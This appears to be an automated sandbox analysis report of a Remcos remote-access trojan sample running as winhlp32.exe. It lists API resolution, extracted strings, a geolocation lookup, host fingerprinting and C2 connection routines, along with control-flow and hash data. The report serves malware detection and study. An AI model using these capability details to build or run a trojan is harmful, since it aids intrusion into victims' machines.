48219->48217 48221 4051fb 48220->48221 48230 405274 48221->48230 48223 405208 48223->47749 48225 402061 48224->48225 48226 4023ce 11 API calls 48225->48226 48227 40207b 48226->48227 48252 40267a 48227->48252 48231 405282 48230->48231 48232 405288 48231->48232 48233 40529e 48231->48233 48241 4025f0 48232->48241 48235 4052f5 48233->48235 48236 4052b6 48233->48236 48250 4028a4 22 API calls 48235->48250 48239 4028e8 28 API calls 48236->48239 
48240 40529c 48236->48240 48239->48240 48240->48223 48242 402888 22 API calls 48241->48242 48243 402602 48242->48243 48244 402672 48243->48244 48246 402629 48243->48246 48251 4028a4 22 API calls 48244->48251 48248 4028e8 28 API calls 48246->48248 48249 40263b 48246->48249 48248->48249 48249->48240 48253 40268b 48252->48253 48254 4023ce 11 API calls 48253->48254 48255 40208d 48254->48255 48255->47752 48256->47760 48257->47765 48260 41bfc4 GetCurrentProcess 48259->48260 48261 41b2d1 48259->48261 48260->48261 48262 4135a6 RegOpenKeyExA 48261->48262 48263 4135d4 RegQueryValueExA RegCloseKey 48262->48263 48264 4135fe 48262->48264 48263->48264 48265 402093 28 API calls 48264->48265 48266 413613 48265->48266 48266->47776 48267->47787 48269 40b90c 48268->48269 48274 402252 48269->48274 48271 40b917 48278 40b92c 48271->48278 48273 40b926 48273->47795 48275 40225c 48274->48275 48276 4022ac 48274->48276 48275->48276 48285 402779 11 API calls std::_Deallocate 48275->48285 48276->48271 48279 40b966 48278->48279 48280 40b938 48278->48280 48297 4028a4 22 API calls 48279->48297 48286 4027e6 48280->48286 48284 40b942 48284->48273 48285->48276 48287 4027ef 48286->48287 48288 402851 48287->48288 48289 4027f9 48287->48289 48299 4028a4 22 API calls 48288->48299 48292 402802 48289->48292 48294 402815 48289->48294 48298 402aea 28 API calls __EH_prolog 48292->48298 48293 402813 48293->48284 48294->48293 48296 402252 11 API calls 48294->48296 48296->48293 48298->48293 48300->47798 48302 402347 48301->48302 48303 402252 11 API calls 48302->48303 48304 4023c7 48303->48304 48304->47798 48306 4024f9 48305->48306 48307 40250a 28 API calls 48306->48307 48308 4020b1 48307->48308 48308->47461 48325 43ba0a 48309->48325 48311 43ae50 48331 43a7b7 36 API calls 3 library calls 48311->48331 48313 43ae15 48313->48311 48314 43ae2a 48313->48314 48324 43ae2f _Atexit 48313->48324 48330 4405dd 20 API calls _Atexit 48314->48330 48317 43ae5c 48318 43ae8b 48317->48318 48332 43ba4f 40 API calls __Tolower 
48317->48332 48321 43aef7 48318->48321 48333 43b9b6 20 API calls 2 library calls 48318->48333 48334 43b9b6 20 API calls 2 library calls 48321->48334 48322 43afbe _strftime 48322->48324 48335 4405dd 20 API calls _Atexit 48322->48335 48324->47833 48326 43ba22 48325->48326 48327 43ba0f 48325->48327 48326->48313 48336 4405dd 20 API calls _Atexit 48327->48336 48329 43ba14 _Atexit 48329->48313 48330->48324 48331->48317 48332->48317 48333->48321 48334->48322 48335->48324 48336->48329 48343 401fb0 48337->48343 48339 402f1e 48340 402055 11 API calls 48339->48340 48341 402f2d 48340->48341 48341->47847 48342->47850 48344 4025f0 28 API calls 48343->48344 48345 401fbd 48344->48345 48345->48339 48347 40a127 48346->48347 48348 413549 3 API calls 48347->48348 48349 40a12e 48348->48349 48350 40a142 48349->48350 48351 40a15c 48349->48351 48352 409e9b 48350->48352 48353 40a147 48350->48353 48354 40905c 28 API calls 48351->48354 48352->47512 48367 40905c 48353->48367 48356 40a16a 48354->48356 48374 40a179 86 API calls 48356->48374 48360 40a15a 48360->48352 48361->47874 48391 403222 48362->48391 48364 403022 48395 403262 48364->48395 48368 409072 48367->48368 48369 402252 11 API calls 48368->48369 48370 40908c 48369->48370 48375 404267 48370->48375 48372 40909a 48373 40a22d 29 API calls 48372->48373 48373->48360 48387 40a273 163 API calls 48373->48387 48374->48352 48388 40a267 86 API calls 48374->48388 48389 40a289 48 API calls 48374->48389 48390 40a27d 128 API calls 48374->48390 48376 402888 22 API calls 48375->48376 48377 40427b 48376->48377 48378 404290 48377->48378 48379 4042a5 48377->48379 48385 4042df 22 API calls 48378->48385 48381 4027e6 28 API calls 48379->48381 48384 4042a3 48381->48384 48382 404299 48386 402c48 22 API calls 48382->48386 48384->48372 48385->48382 48386->48384 48392 40322e 48391->48392 48401 403618 48392->48401 48394 40323b 48394->48364 48396 40326e 48395->48396 48397 402252 11 API calls 48396->48397 48398 403288 48397->48398 48399 402336 11 API calls 
                                    [Control-flow graph edge list (node addresses and API call annotations) rendered as text; graph data omitted]

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                    • Opcode Fuzzy Hash: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                      • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                      • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                                    • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                    • API String ID: 2281282204-930821335
                                    • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                    • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    [Control-flow graph for function 00404F51 (legend: Executed / Not Executed); edge list omitted]
                                    APIs
                                    • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 2532271599-1507639952
                                    • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                    • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Name$ComputerUser
                                    • String ID:
                                    • API String ID: 4229901323-0
                                    • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                    • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                    • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    [Control-flow graph for function 0040E9C5 (legend: Executed / Not Executed); edge list omitted]
                                    APIs
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 0040E9EE
                                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\winhlp32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                    • API String ID: 2830904901-3471202801
                                    • Opcode ID: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                    • Opcode Fuzzy Hash: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                    • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ErrorLastLocalTime
                                    • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\winhlp32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                    • API String ID: 524882891-2942873003
                                    • Opcode ID: 9db87f3de87cfa8e36bd2aa94494b67ad2d9ce1bdb307b710f7c67c5de9c73d7
                                    • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                    • Opcode Fuzzy Hash: 9db87f3de87cfa8e36bd2aa94494b67ad2d9ce1bdb307b710f7c67c5de9c73d7
                                    • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-2151626615
                                    • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                    • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                    • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                    • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: 17288dea40e09c4a519d4d22f4c5c9f9b95757e2b0a4b77583ffa8c83c2e1810
                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                    • Opcode Fuzzy Hash: 17288dea40e09c4a519d4d22f4c5c9f9b95757e2b0a4b77583ffa8c83c2e1810
